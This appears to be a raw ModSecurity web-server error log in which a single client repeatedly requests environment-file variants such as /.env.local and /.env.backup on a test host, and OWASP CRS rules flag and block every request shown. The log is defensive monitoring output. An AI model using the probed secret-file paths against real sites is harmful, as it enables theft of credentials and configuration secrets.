[Tue Jan 21 15:17:52.140279 2025] [:error] [pid 621512] [client 193.41.206.36:39926] [client 193.41.206.36] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.backup"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.backup"] [unique_id "Z4-skBX999c-l2awnNPVZAAAAAI"]
[Tue Jan 21 15:17:52.140712 2025] [:error] [pid 621512] [client 193.41.206.36:39926] [client 193.41.206.36] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.backup"] [unique_id "Z4-skBX999c-l2awnNPVZAAAAAI"]
[Tue Jan 21 15:17:52.141150 2025] [:error] [pid 621512] [client 193.41.206.36:39926] [client 193.41.206.36] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.backup"] [unique_id "Z4-skBX999c-l2awnNPVZAAAAAI"]
[Tue Jan 21 15:17:54.604860 2025] [:error] [pid 621519] [client 193.41.206.36:56192] [client 193.41.206.36] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.docker.dev"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.docker.dev"] [unique_id "Z4-sktP2g1a8O8tMN8i_4QAAAA8"]
[Tue Jan 21 15:17:54.605245 2025] [:error] [pid 621519] [client 193.41.206.36:56192] [client 193.41.206.36] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.docker.dev"] [unique_id "Z4-sktP2g1a8O8tMN8i_4QAAAA8"]
[Tue Jan 21 15:17:54.605675 2025] [:error] [pid 621519] [client 193.41.206.36:56192] [client 193.41.206.36] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.docker.dev"] [unique_id "Z4-sktP2g1a8O8tMN8i_4QAAAA8"]
[Tue Jan 21 15:17:54.862817 2025] [:error] [pid 621512] [client 193.41.206.36:39926] [client 193.41.206.36] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.dist"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.dist"] [unique_id "Z4-skhX999c-l2awnNPVZQAAAAI"]
[Tue Jan 21 15:17:54.863232 2025] [:error] [pid 621512] [client 193.41.206.36:39926] [client 193.41.206.36] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.dist"] [unique_id "Z4-skhX999c-l2awnNPVZQAAAAI"]
[Tue Jan 21 15:17:54.863713 2025] [:error] [pid 621512] [client 193.41.206.36:39926] [client 193.41.206.36] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.dist"] [unique_id "Z4-skhX999c-l2awnNPVZQAAAAI"]
[Tue Jan 21 15:17:57.438620 2025] [:error] [pid 621519] [client 193.41.206.36:56192] [client 193.41.206.36] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.example"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.example"] [unique_id "Z4-sldP2g1a8O8tMN8i_4gAAAA8"]
[Tue Jan 21 15:17:57.438871 2025] [:error] [pid 621519] [client 193.41.206.36:56192] [client 193.41.206.36] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.example"] [unique_id "Z4-sldP2g1a8O8tMN8i_4gAAAA8"]
[Tue Jan 21 15:17:57.439106 2025] [:error] [pid 621519] [client 193.41.206.36:56192] [client 193.41.206.36] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.example"] [unique_id "Z4-sldP2g1a8O8tMN8i_4gAAAA8"]
[Tue Jan 21 15:17:57.444976 2025] [:error] [pid 621512] [client 193.41.206.36:39926] [client 193.41.206.36] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.docker"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.docker"] [unique_id "Z4-slRX999c-l2awnNPVZgAAAAI"]
[Tue Jan 21 15:17:57.445189 2025] [:error] [pid 621512] [client 193.41.206.36:39926] [client 193.41.206.36] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.docker"] [unique_id "Z4-slRX999c-l2awnNPVZgAAAAI"]
[Tue Jan 21 15:17:57.445402 2025] [:error] [pid 621512] [client 193.41.206.36:39926] [client 193.41.206.36] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.docker"] [unique_id "Z4-slRX999c-l2awnNPVZgAAAAI"]
[Tue Jan 21 15:18:00.134693 2025] [:error] [pid 621512] [client 193.41.206.36:39926] [client 193.41.206.36] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.docker.dev"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.docker.dev"] [unique_id "Z4-smBX999c-l2awnNPVZwAAAAI"]
[Tue Jan 21 15:18:00.135100 2025] [:error] [pid 621512] [client 193.41.206.36:39926] [client 193.41.206.36] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.docker.dev"] [unique_id "Z4-smBX999c-l2awnNPVZwAAAAI"]
[Tue Jan 21 15:18:00.135590 2025] [:error] [pid 621512] [client 193.41.206.36:39926] [client 193.41.206.36] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.docker.dev"] [unique_id "Z4-smBX999c-l2awnNPVZwAAAAI"]
[Tue Jan 21 15:18:00.156112 2025] [:error] [pid 621519] [client 193.41.206.36:56192] [client 193.41.206.36] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.local"] [unique_id "Z4-smNP2g1a8O8tMN8i_4wAAAA8"]
[Tue Jan 21 15:18:00.156523 2025] [:error] [pid 621519] [client 193.41.206.36:56192] [client 193.41.206.36] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.local"] [unique_id "Z4-smNP2g1a8O8tMN8i_4wAAAA8"]
[Tue Jan 21 15:18:00.157000 2025] [:error] [pid 621519] [client 193.41.206.36:56192] [client 193.41.206.36] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.local"] [unique_id "Z4-smNP2g1a8O8tMN8i_4wAAAA8"]
[Tue Jan 21 15:18:02.678385 2025] [:error] [pid 621519] [client 193.41.206.36:56192] [client 193.41.206.36] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.sample"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.sample"] [unique_id "Z4-smtP2g1a8O8tMN8i_5AAAAA8"]
[Tue Jan 21 15:18:02.678773 2025] [:error] [pid 621519] [client 193.41.206.36:56192] [client 193.41.206.36] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.sample"] [unique_id "Z4-smtP2g1a8O8tMN8i_5AAAAA8"]
[Tue Jan 21 15:18:02.679250 2025] [:error] [pid 621519] [client 193.41.206.36:56192] [client 193.41.206.36] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.sample"] [unique_id "Z4-smtP2g1a8O8tMN8i_5AAAAA8"]
[Tue Jan 21 15:18:02.682680 2025] [:error] [pid 621512] [client 193.41.206.36:39926] [client 193.41.206.36] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.example"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.example"] [unique_id "Z4-smhX999c-l2awnNPVaAAAAAI"]
[Tue Jan 21 15:18:02.683019 2025] [:error] [pid 621512] [client 193.41.206.36:39926] [client 193.41.206.36] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.example"] [unique_id "Z4-smhX999c-l2awnNPVaAAAAAI"]
[Tue Jan 21 15:18:02.683450 2025] [:error] [pid 621512] [client 193.41.206.36:39926] [client 193.41.206.36] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.example"] [unique_id "Z4-smhX999c-l2awnNPVaAAAAAI"]
[Tue Jan 21 15:18:05.071444 2025] [:error] [pid 621519] [client 193.41.206.36:56192] [client 193.41.206.36] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.save"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.save"] [unique_id "Z4-sndP2g1a8O8tMN8i_5QAAAA8"]
[Tue Jan 21 15:18:05.071846 2025] [:error] [pid 621519] [client 193.41.206.36:56192] [client 193.41.206.36] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.save"] [unique_id "Z4-sndP2g1a8O8tMN8i_5QAAAA8"]
[Tue Jan 21 15:18:05.072868 2025] [:error] [pid 621519] [client 193.41.206.36:56192] [client 193.41.206.36] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.save"] [unique_id "Z4-sndP2g1a8O8tMN8i_5QAAAA8"]
[Tue Jan 21 15:18:05.129436 2025] [:error] [pid 621512] [client 193.41.206.36:39926] [client 193.41.206.36] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.local"] [unique_id "Z4-snRX999c-l2awnNPVaQAAAAI"]
[Tue Jan 21 15:18:05.129847 2025] [:error] [pid 621512] [client 193.41.206.36:39926] [client 193.41.206.36] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.local"] [unique_id "Z4-snRX999c-l2awnNPVaQAAAAI"]
[Tue Jan 21 15:18:05.130389 2025] [:error] [pid 621512] [client 193.41.206.36:39926] [client 193.41.206.36] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.local"] [unique_id "Z4-snRX999c-l2awnNPVaQAAAAI"]
[Tue Jan 21 15:18:07.811401 2025] [:error] [pid 621519] [client 193.41.206.36:56192] [client 193.41.206.36] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.stage"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.stage"] [unique_id "Z4-sn9P2g1a8O8tMN8i_5gAAAA8"]
[Tue Jan 21 15:18:07.811798 2025] [:error] [pid 621519] [client 193.41.206.36:56192] [client 193.41.206.36] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.stage"] [unique_id "Z4-sn9P2g1a8O8tMN8i_5gAAAA8"]
[Tue Jan 21 15:18:07.812300 2025] [:error] [pid 621519] [client 193.41.206.36:56192] [client 193.41.206.36] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.stage"] [unique_id "Z4-sn9P2g1a8O8tMN8i_5gAAAA8"]
[Tue Jan 21 15:18:07.968306 2025] [:error] [pid 621512] [client 193.41.206.36:39926] [client 193.41.206.36] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.sample"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.sample"] [unique_id "Z4-snxX999c-l2awnNPVagAAAAI"]
[Tue Jan 21 15:18:07.968718 2025] [:error] [pid 621512] [client 193.41.206.36:39926] [client 193.41.206.36] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.sample"] [unique_id "Z4-snxX999c-l2awnNPVagAAAAI"]
[Tue Jan 21 15:18:07.969177 2025] [:error] [pid 621512] [client 193.41.206.36:39926] [client 193.41.206.36] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.sample"] [unique_id "Z4-snxX999c-l2awnNPVagAAAAI"]
[Tue Jan 21 15:18:10.330173 2025] [:error] [pid 621519] [client 193.41.206.36:56192] [client 193.41.206.36] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.travis"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.travis"] [unique_id "Z4-sotP2g1a8O8tMN8i_5wAAAA8"]
